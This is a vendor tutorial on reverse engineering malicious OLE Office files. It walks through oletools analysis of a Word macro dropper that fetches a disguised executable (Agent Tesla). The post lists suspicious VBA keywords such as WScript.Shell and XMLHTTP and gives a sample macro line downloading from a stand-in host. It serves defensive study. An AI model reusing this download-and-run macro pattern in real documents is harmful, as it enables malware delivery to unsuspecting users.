The Beginner’s Guide to OLE Malware Reverse Engineering, Part 1

By BUFFERZONE Team, 19/06/2023

Target audience: Cybersecurity specialists

Tags: OLE, PowerPoint, Excel, Word, Malware, Content Disarm and Reconstruction (CDR), Reverse Engineering.

Microsoft’s Object Linking and Embedding (OLE) [1] is a technology framework for building compound documents across different applications. It lets Windows applications create objects that can be linked to, or embedded within, other documents or applications. The OLE file format stores the result as a compound document structure, so a single file can carry content produced by several applications.

The OLE file format specification [1] served as the default file format for Microsoft Office applications such as Word (“.doc”), PowerPoint (“.ppt”), and Excel (“.xls”) in Office 97 through Office 2003. Starting with Office 2007, a new format known as Office Open XML (OOXML) became the default. We will cover OOXML in future posts. Both the OLE and OOXML file formats are still widely used today because of their flexibility and compatibility. A list of the file formats Microsoft Office supports, by file extension, is available in [2].

However, the flexibility and complexity inherent in the OLE format are also exploited by malware authors for the following reasons:

Versatility and Concealment: OLE’s ability to embed various object types, including executable code, enables malware authors to disguise malicious code within harmless-looking files. This can be used to exploit parsing vulnerabilities in Component Object Model (COM) [3] objects, or simply to camouflage malicious code so that antivirus software has a harder time detecting it.
Broad Usage: The ubiquity of Microsoft Office applications, which extensively employ the OLE format, provides a large base of potential targets worldwide. Consequently, this wide usage makes them an attractive avenue for attackers. In many instances, users tend to open these documents without a second thought, especially when they come from seemingly trustworthy sources, making the spread of malware even easier.
Complexity and Obfuscation: The complexity of the OLE format can be utilized to obfuscate the true intent of malicious code, making its detection and analysis more challenging for cybersecurity tools and professionals. The format’s capacity to embed or link diverse object types can be manipulated to mask the presence of harmful elements within the compound structure of the document.
Trust Exploitation: Files created in familiar applications, such as Word or Excel, are often considered safe by users. This implicit trust can be exploited by malware authors who embed malicious elements within such documents. As a result, harmful content can potentially bypass initial security checks, leading to successful infiltration.

In response to these threats, there is a continuous development of advanced security measures and tools aimed at detecting and disarming such exploits. However, the intricate and versatile nature of the OLE format continues to present a significant challenge in the field of cybersecurity. These factors combined make OLE files an attractive medium for malware authors.

OLE File Format

There have been two main versions of OLE: OLE 1.0 and OLE 2.0. An OLE file is a compound file and it is structured as a file system within a file.

OLE 1.0: This is Microsoft’s first version. It allowed documents created in one application to be embedded into another, but it only worked with Microsoft’s own applications and was limited in other ways. OLE 1.0 is specified only to allow for backward-compatible implementations.
OLE 2.0: This is an improved version of OLE. It works with more than just documents and can interact with software components. It improved user interaction with features like drag-and-drop, and it allowed users to edit embedded objects without leaving the original application.

In this blog we will focus on OLE 2.0.

An OLE 2.0 file contains data objects that are stored like files within the file, together with directory tables that provide reference information about those objects. The directories in the file are called storages and the file objects are called streams.
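As a quick triage step, an OLE 2.0 compound file can be recognized by its 8-byte signature before any tool is run on it. The following is a minimal sketch that only uses the Python standard library; the function name `read_ole_header` is our own, and the field offsets are taken from the compound file header layout. It is an illustration, not a full parser.

```python
import struct

# Signature found at the start of every OLE 2.0 compound file.
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")


def read_ole_header(data: bytes):
    """Return a few header fields, or None if data is not an OLE compound file.

    Hypothetical helper for illustration; pass at least the first 512 bytes.
    """
    if len(data) < 512 or data[:8] != OLE_MAGIC:
        return None
    # Offsets 24..33: minor version, major version, byte order,
    # sector shift, mini sector shift (all little-endian 16-bit values).
    minor, major, _byte_order, sector_shift, mini_shift = struct.unpack_from(
        "<HHHHH", data, 24
    )
    return {
        "major_version": major,
        "minor_version": minor,
        "sector_size": 1 << sector_shift,       # typically 512 or 4096
        "mini_sector_size": 1 << mini_shift,    # typically 64
    }
```

A typical call would read only the first sector, for example `read_ole_header(open(path, "rb").read(512))`. A `None` result means the file is not an OLE 2.0 container (it may be OOXML, which is a ZIP archive).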

Oletools [4] is a suite of static analysis tools. In this blog we will use oleid, oledir, olevba, and oleobj.

To show the structure, we will use oledir by running oledir <file>. Oledir is a script that displays all the directory entries of an OLE file, including free and orphaned entries. For each entry, the output shows the Status (used/unused), the Type (Root, Stream, Storage, Empty), the Name of the entry, and its place in the file structure with a size indication.

In this blog we will not go into the details of the file header and the File Allocation Table (FAT) [1].
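To make the directory listing less of a black box, here is a minimal sketch of how a single 128-byte directory entry can be decoded with the Python standard library. This is not how oledir itself is implemented; `parse_dir_entry` and `ENTRY_TYPES` are names we made up for illustration, and the field offsets follow the compound file directory entry layout.

```python
import struct

# Object type byte mapped to the Type labels mentioned above.
ENTRY_TYPES = {0: "Empty", 1: "Storage", 2: "Stream", 5: "Root"}


def parse_dir_entry(raw: bytes) -> dict:
    """Decode one 128-byte directory entry (hypothetical helper)."""
    if len(raw) != 128:
        raise ValueError("a directory entry is exactly 128 bytes")
    # Offset 64: name length in bytes, including the 2-byte UTF-16 terminator.
    name_len = min(struct.unpack_from("<H", raw, 64)[0], 64)
    name = raw[: max(name_len - 2, 0)].decode("utf-16-le", errors="replace")
    obj_type = raw[66]  # offset 66: object type
    # Offset 116: starting sector (32-bit), offset 120: stream size (64-bit).
    start_sector, size = struct.unpack_from("<IQ", raw, 116)
    return {
        "name": name,
        "type": ENTRY_TYPES.get(obj_type, "Unknown"),
        "start_sector": start_sector,
        "size": size,
    }
```

Locating the directory entries inside a real file requires following the sector chain from the header, which is out of scope here. In practice we rely on oledir to do that work.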

Malware Investigation Research Steps:

Investigating OLE malware requires a careful and systematic approach. Below are the steps we follow in our research and strongly recommend:

Isolation: Always work in a safe environment when dealing with potential malware. This usually means using a sandbox or a dedicated, isolated system that is not connected to your network. In this blog we will work inside an Ubuntu virtual machine.
Collection: The first step is gathering potentially malicious OLE files. These can be sourced from various locations such as spam emails, suspicious websites, or threat intelligence feeds. We will use MalwareBazaar, a public malware repository, to obtain interesting samples for analysis.
Static Analysis: Start by examining the OLE file without executing it. This includes viewing the file metadata, the structure, the embedded objects, scripts, and any unusual elements. In this blog we will use oledir, oleid, olevba, and oleobj from the OleTools suite [4].
Dynamic Analysis: This involves monitoring the behavior of the OLE file when it is opened. You would typically use a sandbox environment for this, which can safely log the actions of the file, such as network connections, file system modifications, or registry changes. Dynamic analysis often reveals evasive behavior that we missed during static analysis or are unfamiliar with. This part is outside this blog’s focus.
Payload Extraction: If the OLE file has an embedded payload, it needs to be extracted for further analysis. This could be another file, a script, or something else. Payload extraction can be done as part of either the static analysis or the dynamic analysis.
Code Analysis: If the OLE file includes embedded or obfuscated code, such as macros or PowerShell, it needs to be analyzed. This involves de-obfuscating the code, understanding its functionality, and identifying any exploits or vulnerabilities it might use. We will do this as part of our static analysis.
Threat Intelligence Correlation: Correlate the information collected about the OLE malware with threat intelligence data. This can give information on the possible threat actors, campaigns, their methods, or whether this malware has been observed before. This step is done after the collection and during the static and dynamic analysis. When we discover Indicators of Compromise (IOCs) in the file, such as hashes of dropped files (SHA-256/MD5), URLs, and IP addresses, we can use threat intelligence to better understand the file’s capabilities.
Reporting: Finally, document your findings. This report should detail the characteristics of the malware, how it works, its impact, and recommended mitigation strategies.

Remember to always stay safe when investigating potential malware, and only do so in a controlled and isolated environment. It is important to keep systems and software up to date to protect against known vulnerabilities that malware often exploits. This tutorial is for educational purposes only. Please take full responsibility while handling dangerous malicious files.

OLE Research

In this blog we will investigate sha256: 91cf5e5060f254905b48d517addd966c3f43454de14c376e8cb3b45fbd3058c9
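Before starting, it is worth confirming that the file on disk really is the sample named above. The sketch below computes a SHA-256 digest with Python’s standard `hashlib` module and compares it with the hash from this blog. The helper names `sha256_of_file` and `matches_expected` are our own, and the sample path is whatever you saved the file as inside your isolated virtual machine.

```python
import hashlib

# SHA-256 of the sample investigated in this blog.
EXPECTED_SHA256 = "91cf5e5060f254905b48d517addd966c3f43454de14c376e8cb3b45fbd3058c9"


def sha256_of_file(path, chunk_size=65536):
    """Hash a file in chunks so large samples do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_expected(path, expected=EXPECTED_SHA256):
    """Return True if the file's digest equals the expected hex string."""
    return sha256_of_file(path) == expected.lower()
```

The same digest is what we paste into VirusTotal or a sandbox search, so computing it locally avoids uploading the sample itself.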

Threat Intelligence:

The first stage is to look up the file in VirusTotal to get its reputation and other information about it.

We can observe that the file is detected as malicious by 44 engines, and the popular threat label is a trojan of type valyria/w97m.

Dynamic Analysis:

From viewing the file in a Joe Security sandbox environment, we can observe that the file has a lure image:

The image lures the user into clicking “Enable Editing” and “Enable Content”. This is a classic lure for enabling the execution of dynamic content inside the document.

We can observe that the malware downloads an executable from the internet (a .png file that is actually an executable and not an image) and runs it.
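A mismatch like this, where the extension says image but the content is an executable, can be checked from the first bytes of the file. The following is a minimal sketch using only the standard library; `sniff_type` and `looks_like_pe` are hypothetical helper names, and the check covers only the PNG signature and the Windows PE header.

```python
import struct

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"  # 8-byte PNG signature


def looks_like_pe(data: bytes) -> bool:
    """Check for an MZ header whose e_lfanew field points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    return data[pe_offset:pe_offset + 4] == b"PE\x00\x00"


def sniff_type(data: bytes) -> str:
    """Classify content by magic bytes, ignoring the file name entirely."""
    if data.startswith(PNG_MAGIC):
        return "png"
    if looks_like_pe(data):
        return "pe"
    return "unknown"
```

If `sniff_type` returns `"pe"` for a file named with a `.png` extension, the extension is being used as a disguise, which matches what the sandbox reported for this sample.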

Now let’s do the same based on static analysis.

Static Analysis:

We will initiate our analysis using oleid, a script specifically designed to scrutinize OLE files. It can identify distinctive attributes associated with malicious files. Notably, it can detect the presence of VBA macros and embedded Flash objects.

After running oleid <file>:

The oleid analysis reveals the presence of a VBA macro within the file, and adds that it contains suspicious keywords. As a result, we next run the olevba <file> command.

The output uncovers pertinent details regarding the VBA macro detected. It is evident that there is an auto execution command within the document, identified through the keyword ‘Document_open’. A series of suspicious keywords have also been flagged: ‘Open’, ‘write’, ‘savetofile’, ‘shell’, ‘WScript.Shell’, and ‘CreateObject Microsoft.XMLHTTP’, suggesting substantial activity within this VBA macro.
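The same findings can be collected programmatically. The sketch below assumes oletools is installed (`pip install oletools`) and uses its `VBA_Parser` class, whose `analyze_macros()` method returns `(type, keyword, description)` tuples. The helper names `group_findings` and `scan_document` are our own, and the oletools import is done lazily so the grouping helper can be used on its own.

```python
from collections import defaultdict


def group_findings(findings):
    """Group (type, keyword, description) tuples by their type."""
    grouped = defaultdict(list)
    for kind, keyword, _description in findings:
        grouped[kind].append(keyword)
    return dict(grouped)


def scan_document(path):
    """Run olevba's macro analysis on one file and group the results.

    Assumption: oletools is installed in the analysis VM.
    """
    from oletools.olevba import VBA_Parser  # third-party, imported lazily

    parser = VBA_Parser(path)
    try:
        if not parser.detect_vba_macros():
            return {}
        return group_findings(parser.analyze_macros())
    finally:
        parser.close()
```

For a document like ours, we would expect the grouped result to contain an `AutoExec` entry, several `Suspicious` keywords, and an `IOC` entry, mirroring the table that the command-line tool prints.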

Additionally, olevba reports an Indicator of Compromise (IOC): a URL. From the dynamic analysis, we know that the file served at this URL, despite its PNG extension, is in fact an executable.

The use of Olevba allows us to inspect the macro more closely. It reveals that upon opening the document, the script instantaneously downloads the faux PNG file, stores it, and subsequently executes it. This behavior corresponds precisely to what we observed during our dynamic analysis.
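When reading macro source by hand, it helps to pull out the URLs automatically and defang them before they go into a report. The following is a minimal sketch using a simple regular expression. The macro text in the usage note is a made-up stand-in and not the code of the analyzed sample, and `extract_urls` and `defang` are hypothetical helper names.

```python
import re

# Deliberately simple pattern: stops at whitespace, quotes, and brackets.
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.IGNORECASE)


def extract_urls(vba_source):
    """Return the unique URLs found in macro source, in order of appearance."""
    seen = []
    for url in URL_RE.findall(vba_source):
        if url not in seen:
            seen.append(url)
    return seen


def defang(url):
    """Make a URL non-clickable for reports (lower-case scheme assumed)."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")
```

For example, given a hypothetical macro line such as `req.Open "GET", "http://malicious.example/image.png", False`, `extract_urls` returns the single URL and `defang` turns it into `hxxp://malicious[.]example/image[.]png`. Obfuscated macros often build URLs from string fragments, in which case a plain regular expression will miss them and de-obfuscation has to come first.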

At the time of writing, the website is already down, so we cannot download the malicious file manually (something that should only ever be done inside a secure virtual machine). However, the dynamic analysis of the document gives us the SHA-256 of the downloaded file, which we can search for in VirusTotal:

We can observe that the downloaded executable is recognized by most detection engines:

In VirusTotal, the Behavior and Community sections contain reports from different sandbox vendors that analyzed the executable. From their analyses we learn that the file is a sample of the Agent Tesla spyware. We strongly recommend visiting the Community section of VirusTotal to explore the various dynamic analyses conducted on this file.

References

[1] Object Linking and Embedding (OLE) Data Structures, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-oleds/85583d21-c1cf-4afe-a35f-d6701c5fbb6f

[2] File format reference for Word, Excel, and PowerPoint, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference

[3] Component Object Model (COM), https://learn.microsoft.com/en-us/windows/win32/com/component-object-model--com--portal

[4] OleTools, https://github.com/decalage2/oletools
